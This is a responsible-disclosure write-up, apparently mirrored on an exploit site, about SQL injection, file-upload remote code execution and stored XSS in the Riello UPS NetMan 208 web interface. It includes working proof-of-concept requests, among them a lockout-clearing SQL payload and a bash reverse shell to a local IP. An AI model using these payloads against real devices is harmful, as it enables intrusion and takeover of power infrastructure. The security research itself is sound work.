## https://sploitus.com/exploit?id=E2D42485-FB1D-5C66-AA1D-ADCC746DA8CA
# Riello UPS with NetMan 208 - Vulnerability Disclosure
During a client engagement, we identified the presence of a [Riello UPS](https://www.riello-ups.it) appliance within the target environment.
Without prior knowledge of its internal architecture or credentials, we conducted a series of black-box tests to assess potential exposure and evaluate the applianceās resilience against unauthorized access and common attack vectors. Then, we downloaded the firmware from the vendorās website to conduct further tests. The analysis led to the identification of some vulnerabilities which may allow an attacker to exploit specific weaknesses in the applianceās security mechanisms that would like to disclosure following the responsible disclosure process.
In the following section, we present the test environment we set up and the technical details of the vulnerabilities we found.
## Table of contents
* [1. Environment](#1-environment)
* [2. Technical details](#2-technical-details)
* [2.1. Unauthenticated SQL Injection](#21-unauthenticated-sql-injection)
* [2.2. Remote Command Execution via Arbitrary File Upload](#22-remote-command-execution-via-arbitrary-file-upload)
* [2.3. Stored Cross-Site Scripting (XSS)](#23-stored-cross-site-scripting-xss)
* [3. Disclosure](#3-disclosure)
## 1. Environment
In order to validate the finding in a controlled and reproducible manner, we performed a secondary assessment on the software executed on the appliance, deployed on a dedicated virtualized environment. This allowed us to confirm the issue independently of the production environment and rule out any context-specific variables.
Specifically, a docker container was prepared with NetMan application, obtained extracting the downloaded image from Riello UPS [Netman 208](https://www.riello-ups.it/downloads/92-netman-208). The base image used is the latest Ubuntu and the JDK installed was the `zulu11.80.21-ca-jdk11.0.27`. The NetMan software was executed as root user.
With this setup we can suppose that the Riello UPS with NetMan 208 vulnerable version are:
| component | version |
| :--------------------------- | :----------- |
| NetMan 208 Operating System: | Version 1.5 |
| NetMan 208 Application: | Version 1.11 |
| NetMan 208 JVM: | Version 1.0 |
## 2. Technical details
### 2.1. Unauthenticated SQL Injection
A SQL Injection exists in Riello UPS with NetMan 208 due to improper validation of user supplied input in username field in `/cgi-bin/login.cgi`. This makes it possible for unauthenticated attackers to make stacked queries in `LOGINFAILEDTABLE` table to bypass brute-force protection in "standard" login (e.g. no LDAP).
#### Description
Exploiting a SQL Injection in the login workflow we were able to delete the `LOGINFAILEDTABLE` table content allowing to avoid the rate limit protection against brute-force attack. The following is the HTTP request used in the proof-of-concept:
```
POST /cgi-bin/login.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 94
Connection: keep-alive
logintype=standard&username=admin';DELETE FROM LOGINFAILEDTABLE WHERE 1=1; -- &password=bbbbbb
```
Detailed description
Trying to login several times with wrong credentials, the application locks the account providing the user the message "*Please wait before try again*".

The analysis highlighted that the `username` parameter is vulnerable to SQL Injection. It is possible to exploit it with stacked queries to delete all entries in the `LOGINFAILEDTABLE` table with the payload `ā;DELETE FROM LOGINFAILEDTABLE WHERE 1=1; -- `. With the *admin* user, for example, the request payload can be:
```
logintype=standard&username=adminā;DELETE FROM LOGINFAILEDTABLE WHERE 1=1; --&password=try
```
As it is possible to see in the following evidence, the first response is again "*Please wait before try again*" but the database is now empty.

By trying to login again with a valid username the check on the user lock does not apply allowing the user to make the attempt.
The request with the SQL Injection payload and the normal login can be alternated to avoid brute-force protection.
It is also possible to automate this attack by adding the SQL Injection to empty the table after some attempts (for example 3) to bypass the brute-force protection.
### 2.2. Remote Command Execution via Arbitrary File Upload
An arbitrary file upload exists in Riello UPS with NetMan 208, specifically in `/cgi-bin/certsupload.cgi`. This vulnerability allows authenticated attackers to achieve remote code execution by uploading malicious files.
#### Description
Exploiting an arbitrary file upload on the certificate upload feature as an admin user, itās possible to overwrite existing resources on the server file system. An attacker can overwrite an existing CGI file that will be executed as soon as the script is accessed.
Detailed description
When an admin user uploads a certificate file, the web application appears to utilize the raw, user-provided filename to save it locally on the file system. This is vulnerable to path traversal and arbitrary file write and allows an attacker to overwrite files within the file system by specifying the full path as the filename.
In this scenario, we were able to modify the contents of the `/cgi-bin/runin.cgi` file to execute the following arbitrary commands:
```bash
echo āexecution codeā
echo ā$idā
```
As you can see in the following screenshot:

Calling `/cgi-bin/runin.cgi` it execute the payload:

In a real scenario a potential attacker could execute more complex commands, such as a bash reverse shell which gets executed upon calling the file. This could lead to a complete compromise of the system leading to a remote code execution.
So, as proof of concept, we try to write the following reverse shell code:
```bash
bash -i >& /dev/tcp/172.17.0.1/4444 0>&1 &
```
As per the following screenshot:

And we gain a remote shell on NetMan 208:

### 2.3. Stored Cross-Site Scripting (XSS)
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Riello UPS with NetMan 208 due to improper validation of user supplied input in `/cgi-bin/loginbanner_w.cgi`. An authenticated attacker can inject malicious script into pre/post login banner title and message that will be executed when viewed by anyone going to the home page.
#### Description
The login banner functionality allows you to inject JavaScript payload into the banners; the payload will be executed by the user that accesses the page with the embedded banners (for example on the login page).
Detailed description
Authenticated administrative users can modify the various banners, such as the `pre-login banner`, and `post-login banner`. During the edit no input sanitization mechanism was identified. Since no limitation on the HTML tags has been detected itās also possible to embed any tag. If an administrator changes the banner to include JavaScript code enclosed in the `` tag, then itās executed in the victim browser.
For example, if you modify the `pre_login_banner_title` POST field in `/cgi-bin/loginbanner_w.cgi` with a basic Cross-Site Scripting payload like this one:
```html
alert('xss')
```
As you can see in following request:

The script is executed by the browser of who visit the Rello UPS NetMan 208 login page.

Other vulnerable fields in this request are: `pre_login_banner_message`, `pre_login_banner_message`, `post_login_admin_banner_title`, `post_login_admin_banner_message`, `post_login_power_banner_title`, `post_login_power_banner_message`, `post_login_view_banner_title`, `post_login_view_banner_message`.
> Please note that even if this issue is exploitable as admin user, **the session cookie has no HttpOnly flag** set and the XSS could be used to obtain other users (viewer/power) cookies.
## 3. Disclosure
Weāve decided to follow the industry standard 90+30 days responsible disclosure process; hereās the timeline:
- **November 11, 2025**: Sent initial report to Rielloās security team (security-incident@riello-ups.com) with full technical details and PoC exploits. All compiled according to their [Vulnerability Disclosure Policy](https://www.riello-ups.it/pages/177-vulnerability-disclosure).
- **November 14, 2025**: Riello confirms theyāve succesfully replicate the vulnerabilities and sets the timeline for the remediation patch to three-four weeks.
- **December 23, 2025**: Riello publish a new APP release (**1.12**) available on [Driver & Download page](https://www.riello-ups.it/downloads/92-netman-208).